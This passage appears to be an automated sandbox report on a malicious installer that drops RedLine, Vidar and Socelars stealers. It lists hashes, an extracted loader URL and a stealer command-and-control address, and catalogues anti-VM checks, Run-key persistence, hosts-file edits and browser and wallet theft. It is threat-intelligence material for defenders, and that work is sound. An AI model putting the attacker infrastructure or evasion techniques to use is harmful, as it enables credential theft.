Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
30-09-2021 05:45
210930-gf4veagef9 1029-09-2021 21:32
210929-1dyp6agaam 1029-09-2021 18:54
210929-xkfldaffb2 10Analysis
-
max time kernel
1804s -
max time network
1810s -
platform
windows11_x64 -
resource
win11 -
submitted
29-09-2021 21:32
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
7.1MB
-
MD5
cd08a9c57ce8115745d3a99dec48847d
-
SHA1
2ea5cea16935f511935a86ea7a2903a44d593247
-
SHA256
52895feec7505eb0c3a418c93ecaf8559d4d7f9f67c68e3a268c606c069d04cc
-
SHA512
0ad7757713eca784f6b8c50e1912f91264f0e210dd61e7a6e779390dc2040b6744d552aac120c2ec8d65bfbb048672cb7959d026691ef1037b63e24fec024233
Malware Config
Extracted
http://shellloader.top/welcome
Extracted
redline
ANI
45.142.215.47:27643
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5412 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3132 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1012 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3584 4884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 21624 4884 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5560-271-0x0000000000000000-mapping.dmp family_redline behavioral4/memory/5560-273-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15ac1df9305ded09.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15ac1df9305ded09.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 47 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exetaskkill.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5540 created 4172 5540 WerFault.exe ShadowVPNInstaller_t1.exe PID 860 created 2412 860 rundll32.exe PID 5292 created 4604 5292 WerFault.exe Wed15edb855a49.exe PID 5880 created 5072 5880 WerFault.exe powershell.exe PID 6124 created 4692 6124 WerFault.exe Wed15bfd6504f7748c.exe PID 4568 created 4520 4568 svchost.exe Wed151f5e3fd2.exe PID 1940 created 5228 1940 WerFault.exe Wed15c2e7469a14dca.exe PID 4948 created 5528 4948 WerFault.exe Conhost.exe PID 6044 created 4172 6044 taskkill.exe ShadowVPNInstaller_t1.exe PID 4468 created 5272 4468 WerFault.exe setup.exe PID 5200 created 4172 5200 cmd.exe ShadowVPNInstaller_t1.exe PID 4908 created 4172 4908 WerFault.exe ShadowVPNInstaller_t1.exe PID 2608 created 4172 2608 WerFault.exe ShadowVPNInstaller_t1.exe PID 3152 created 5552 3152 WerFault.exe rundll32.exe PID 6332 created 1488 6332 WerFault.exe rqSglvJaLP5XGFHBpG4Rc_Oz.exe PID 6872 created 5452 6872 WerFault.exe ohd5DBCBKYGq0Rq0oGsWYQsB.exe PID 6608 created 1484 6608 WerFault.exe KH_hTf7gZq3Wmprg77dfBrV9.exe PID 4232 created 5192 4232 WerFault.exe Vg807KHIlrePhVsM_k1biafy.exe PID 5872 created 4264 5872 WerFault.exe tYebFztzNZipmvbK7t_wj8Yf.exe PID 5212 created 1012 5212 WerFault.exe rundll32.exe PID 936 created 5132 936 WerFault.exe V0r_jI4hAYH6tmEtRu0LFAGe.exe PID 1108 created 3856 1108 WerFault.exe GcleanerEU.exe PID 7408 created 5648 7408 WerFault.exe vc.exe PID 1608 created 1208 1608 WerFault.exe WerFault.exe PID 7188 created 7740 7188 Conhost.exe PID 1500 created 2188 1500 WerFault.exe gcleaner.exe PID 4528 created 4172 4528 WerFault.exe ShadowVPNInstaller_t1.exe PID 1560 created 4172 1560 WerFault.exe ShadowVPNInstaller_t1.exe PID 8028 created 4172 8028 WerFault.exe ShadowVPNInstaller_t1.exe PID 1208 created 4172 1208 WerFault.exe ShadowVPNInstaller_t1.exe PID 8180 created 4172 8180 WerFault.exe ShadowVPNInstaller_t1.exe PID 8048 created 4172 8048 WerFault.exe ShadowVPNInstaller_t1.exe PID 6648 created 4172 6648 WerFault.exe ShadowVPNInstaller_t1.exe PID 4524 created 4172 4524 WerFault.exe ShadowVPNInstaller_t1.exe PID 6576 created 2656 6576 WerFault.exe OUwWzxudrdRKwfe4TAMw2v9N.exe PID 5504 created 4172 5504 WerFault.exe ShadowVPNInstaller_t1.exe PID 5060 created 1160 5060 WerFault.exe rundll32.exe PID 7252 created 6804 7252 WerFault.exe ECpQxvrk7QdfeLYkQ6sFcXH5.exe PID 6268 created 3976 6268 WerFault.exe 6FWMzlXnCtqJ3wOoKIv1m2Cg.exe PID 3180 created 6736 3180 WerFault.exe E747.exe PID 5780 created 5128 5780 WerFault.exe 231A.exe PID 21760 created 21652 21760 WerFault.exe rundll32.exe PID 22404 created 20536 22404 WerFault.exe GcleanerEU.exe PID 22548 created 20620 22548 WerFault.exe gcleaner.exe PID 23792 created 22148 23792 WerFault.exe InternodesPiets_2021-09-29_21-00.exe PID 17180 created 17104 17180 WerFault.exe E1BD.exe PID 17480 created 17428 17480 WerFault.exe 14.exe -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral4/memory/5228-374-0x00000000021E0000-0x00000000022B4000-memory.dmp family_vidar behavioral4/memory/5528-418-0x00000000021D0000-0x00000000022A4000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS043E7880\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043E7880\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043E7880\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043E7880\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043E7880\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS043E7880\libcurlpp.dll aspack_v212_v242 -
Blocklisted process makes network request 64 IoCs
Processes:
schtasks.exepowershell.execmd.exepowershell.exeflow pid process 34 1112 schtasks.exe 35 1112 schtasks.exe 36 1112 schtasks.exe 37 1112 schtasks.exe 38 1112 schtasks.exe 44 1112 schtasks.exe 69 1112 schtasks.exe 76 5196 powershell.exe 80 1112 schtasks.exe 81 1112 schtasks.exe 82 1112 schtasks.exe 83 1112 schtasks.exe 84 1112 schtasks.exe 85 1112 schtasks.exe 86 1112 schtasks.exe 87 1112 schtasks.exe 88 1112 schtasks.exe 89 1112 schtasks.exe 90 1112 schtasks.exe 91 1112 schtasks.exe 92 1112 schtasks.exe 93 1112 schtasks.exe 94 1112 schtasks.exe 95 1112 schtasks.exe 96 1112 schtasks.exe 97 1112 schtasks.exe 98 1112 schtasks.exe 99 1112 schtasks.exe 100 1112 schtasks.exe 101 1112 schtasks.exe 102 1112 schtasks.exe 103 1112 schtasks.exe 104 1112 schtasks.exe 105 1112 schtasks.exe 106 1112 schtasks.exe 107 1112 schtasks.exe 108 1112 schtasks.exe 109 1112 schtasks.exe 112 1112 schtasks.exe 113 1112 schtasks.exe 114 1112 schtasks.exe 116 1112 schtasks.exe 136 1112 schtasks.exe 137 1112 schtasks.exe 145 2336 cmd.exe 159 5932 powershell.exe 160 5932 powershell.exe 183 5932 powershell.exe 184 5932 powershell.exe 193 5932 powershell.exe 197 5932 powershell.exe 203 5932 powershell.exe 208 5932 powershell.exe 212 2336 cmd.exe 248 5932 powershell.exe 271 5932 powershell.exe 273 5932 powershell.exe 274 5932 powershell.exe 275 5932 powershell.exe 276 5932 powershell.exe 277 5932 powershell.exe 278 5932 powershell.exe 279 5932 powershell.exe 280 5932 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Sayma.exeSharefolder.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Sayma.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Sharefolder.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeWed1529d8198a8f0c1.exeWed151f5e3fd2.exeWed154a69e494d5e99ca.exeWed15228d911b9d5c.exeWed15e2f113a40ce5.exeWed15cdfe4f1ee8.exeWed15ac1df9305ded09.exeWed15edb855a49.exeWed1556d5b7e9b2c8.exeWed15bfd6504f7748c.exeWed15fbd6ef41b4f.exeWed15c2e7469a14dca.exeWed15fbd6ef41b4f.tmpWed15566afaea59e.exeWed150b6a68b74a9.exeSayma.exeWed15e2f113a40ce5.exeLzmwAqmV.exeSkVPVS3t6Y8W.EXeultramediaburner.tmp4950523.scrChrome 5.exeConhost.exeinst3.exe2420799.scrShadowVPNInstaller_t1.exeexplorer.exeVC_redist.x86.exeInstall.exeDownFlSetup110.exesetup.exeWinHoster.exemsedge.exesetup_2.exejhuuee.exesetup_2.tmppli-game.exesetup_2.exeBearVpn 3.exesetup_2.tmp8363683.scr7195126.scr4MCYlgNAW.eXEpostback.exe2990560.scrWerFault.exeultramediaburner.exeinstaller.exeNobobikagu.exeinstaller.tmpUltraMediaBurner.exeFasonijishae.exevc.exeservices64.exevc.exeezACXYv8D.exeInstall.exeInstall.exeINSTAL~1.EXEohd5DBCBKYGq0Rq0oGsWYQsB.exepid process 4928 setup_installer.exe 3776 setup_install.exe 5036 Wed1529d8198a8f0c1.exe 4520 Wed151f5e3fd2.exe 1320 Wed154a69e494d5e99ca.exe 1112 Wed15228d911b9d5c.exe 1676 Wed15e2f113a40ce5.exe 1600 Wed15cdfe4f1ee8.exe 5072 Wed15ac1df9305ded09.exe 4604 Wed15edb855a49.exe 4760 Wed1556d5b7e9b2c8.exe 4692 Wed15bfd6504f7748c.exe 5188 Wed15fbd6ef41b4f.exe 5228 Wed15c2e7469a14dca.exe 5360 Wed15fbd6ef41b4f.tmp 5352 Wed15566afaea59e.exe 5624 Wed150b6a68b74a9.exe 5636 Sayma.exe 5560 Wed15e2f113a40ce5.exe 5824 LzmwAqmV.exe 5872 SkVPVS3t6Y8W.EXe 6048 ultramediaburner.tmp 2488 4950523.scr 3900 Chrome 5.exe 5528 Conhost.exe 5632 inst3.exe 5788 2420799.scr 4172 ShadowVPNInstaller_t1.exe 5864 explorer.exe 3596 VC_redist.x86.exe 5304 Install.exe 3024 DownFlSetup110.exe 5272 setup.exe 4968 WinHoster.exe 1844 msedge.exe 5168 setup_2.exe 5384 jhuuee.exe 504 setup_2.tmp 3208 pli-game.exe 5992 setup_2.exe 3304 BearVpn 3.exe 2128 setup_2.tmp 3228 8363683.scr 6072 7195126.scr 5912 4MCYlgNAW.eXE 4208 postback.exe 4300 2990560.scr 4524 WerFault.exe 6128 ultramediaburner.exe 5712 installer.exe 6048 ultramediaburner.tmp 5412 Nobobikagu.exe 5156 installer.tmp 1696 UltraMediaBurner.exe 2096 Fasonijishae.exe 2340 vc.exe 2112 services64.exe 5648 vc.exe 3596 VC_redist.x86.exe 1992 ezACXYv8D.exe 4596 Install.exe 4660 Install.exe 5944 INSTAL~1.EXE 5452 ohd5DBCBKYGq0Rq0oGsWYQsB.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exeyHaC2ZecLg_YxWmdH3aFDDbT.exeF3FD.exe2990560.scrJzv7xqj_zFOvQQci4U_z8X7S.exebcbmc4SWL8tZPvkxM154mpJP.exeInstall.exe1847311.scrMoney10k_.exeWed15566afaea59e.exe37B.exe2420799.scrdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yHaC2ZecLg_YxWmdH3aFDDbT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F3FD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2990560.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Jzv7xqj_zFOvQQci4U_z8X7S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bcbmc4SWL8tZPvkxM154mpJP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1847311.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Money10k_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Money10k_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Wed15566afaea59e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Wed15566afaea59e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2990560.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bcbmc4SWL8tZPvkxM154mpJP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 37B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2420799.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2420799.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Jzv7xqj_zFOvQQci4U_z8X7S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F3FD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1847311.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 37B.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yHaC2ZecLg_YxWmdH3aFDDbT.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeWed15fbd6ef41b4f.tmprundll32.exesetup_2.tmpsetup_2.tmpcmd.exerundll32.exeinstaller.tmpvc.exerundll32.exerundll32.exerundll32.exeHelper.exeinstaller.exeautosubplayer.exeConhost.exeMsiExec.exeShadowVPNInstaller_t1.exeMsiExec.exer9A3m_8Kh57rxeYKJ11wn3wk.tmprundll32.exeMsiExec.exerundll32.exerundll32.exeautosubplayer.exerundll32.exepid process 3776 setup_install.exe 3776 setup_install.exe 3776 setup_install.exe 3776 setup_install.exe 3776 setup_install.exe 3776 setup_install.exe 3776 setup_install.exe 5360 Wed15fbd6ef41b4f.tmp 2412 rundll32.exe 504 setup_2.tmp 2128 setup_2.tmp 1872 cmd.exe 5552 rundll32.exe 5156 installer.tmp 5648 vc.exe 5204 rundll32.exe 5828 rundll32.exe 5828 rundll32.exe 4132 rundll32.exe 6944 Helper.exe 2800 installer.exe 2800 installer.exe 2800 installer.exe 8120 autosubplayer.exe 7740 Conhost.exe 3864 MsiExec.exe 3864 MsiExec.exe 4172 ShadowVPNInstaller_t1.exe 8120 autosubplayer.exe 4172 ShadowVPNInstaller_t1.exe 4172 ShadowVPNInstaller_t1.exe 6100 MsiExec.exe 6100 MsiExec.exe 6100 MsiExec.exe 6100 MsiExec.exe 6100 MsiExec.exe 6100 MsiExec.exe 6100 MsiExec.exe 6100 MsiExec.exe 6100 MsiExec.exe 6100 MsiExec.exe 2800 installer.exe 6100 MsiExec.exe 6100 MsiExec.exe 4652 r9A3m_8Kh57rxeYKJ11wn3wk.tmp 8120 autosubplayer.exe 8120 autosubplayer.exe 1160 rundll32.exe 2820 MsiExec.exe 2820 MsiExec.exe 6100 MsiExec.exe 7888 rundll32.exe 8120 autosubplayer.exe 8120 autosubplayer.exe 20312 rundll32.exe 20484 autosubplayer.exe 8120 autosubplayer.exe 21652 rundll32.exe 20484 autosubplayer.exe 8120 autosubplayer.exe 8120 autosubplayer.exe 20484 autosubplayer.exe 20484 autosubplayer.exe 8120 autosubplayer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15566afaea59e.exe themida C:\Users\Admin\AppData\Local\Temp\7zS043E7880\Wed15566afaea59e.exe themida behavioral4/memory/5352-270-0x0000000000650000-0x0000000000651000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
Processes:
Sayma.exeInstaller.exeVC_redist.x86.exemsedge.exe4950523.screxplorer.exeezACXYv8D.exeSharefolder.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Mitazhyqaefy.exe\"" Sayma.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" Installer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{a8968509-65be-4c09-a460-fd1584b1cdbf} = "\"C:\\ProgramData\\Package Cache\\{a8968509-65be-4c09-a460-fd1584b1cdbf}\\VC_redist.x86.exe\" /burn.runonce" VC_redist.x86.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4950523.scr Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" explorer.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce ezACXYv8D.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" ezACXYv8D.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Vilabywiha.exe\"" Sharefolder.exe -
Checks for any installed AV software in registry 1 TTPs 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Money10k_.exe5AYhJBzk5DK53YJC_wBu_I8r.exe2420799.scrJzv7xqj_zFOvQQci4U_z8X7S.exebcbmc4SWL8tZPvkxM154mpJP.exe1847311.scrF3FD.exeWed15566afaea59e.exe2990560.scr37B.exeyHaC2ZecLg_YxWmdH3aFDDbT.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Money10k_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5AYhJBzk5DK53YJC_wBu_I8r.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2420799.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Jzv7xqj_zFOvQQci4U_z8X7S.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bcbmc4SWL8tZPvkxM154mpJP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1847311.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F3FD.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Wed15566afaea59e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2990560.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 37B.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA yHaC2ZecLg_YxWmdH3aFDDbT.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exemsiexec.exeInstall.exedescription ioc process File opened (read-only) \??\B: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Z: Install.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 15 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 37 ipinfo.io 132 ipinfo.io 368 ipapi.co 3 ip-api.com 129 ipinfo.io 197 ipinfo.io 328 ipapi.co 1 ip-api.com 1 ipinfo.io 129 icanhazip.com 162 ipinfo.io 163 ipapi.co 3 ipapi.co 162 api.ipify.org 418 api.ipify.org -
Drops file in System32 directory 10 IoCs
Processes:
Install.exerundll32.exerundll32.exeInstall.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
Processes:
Wed15566afaea59e.exe2420799.scr2990560.scrcmd.exeJzv7xqj_zFOvQQci4U_z8X7S.exebcbmc4SWL8tZPvkxM154mpJP.exe1847311.scr37B.exeMoney10k_.exeyHaC2ZecLg_YxWmdH3aFDDbT.exeF3FD.exepid process 5352 Wed15566afaea59e.exe 5788 2420799.scr 4300 2990560.scr 2336 cmd.exe 2816 Jzv7xqj_zFOvQQci4U_z8X7S.exe 2336 cmd.exe 5656 bcbmc4SWL8tZPvkxM154mpJP.exe 2336 cmd.exe 2336 cmd.exe 2336 cmd.exe 680 1847311.scr 2336 cmd.exe 2336 cmd.exe 2336 cmd.exe 7456 37B.exe 22192 Money10k_.exe 5616 yHaC2ZecLg_YxWmdH3aFDDbT.exe 17260 F3FD.exe -
Suspicious use of SetThreadContext 11 IoCs
Processes:
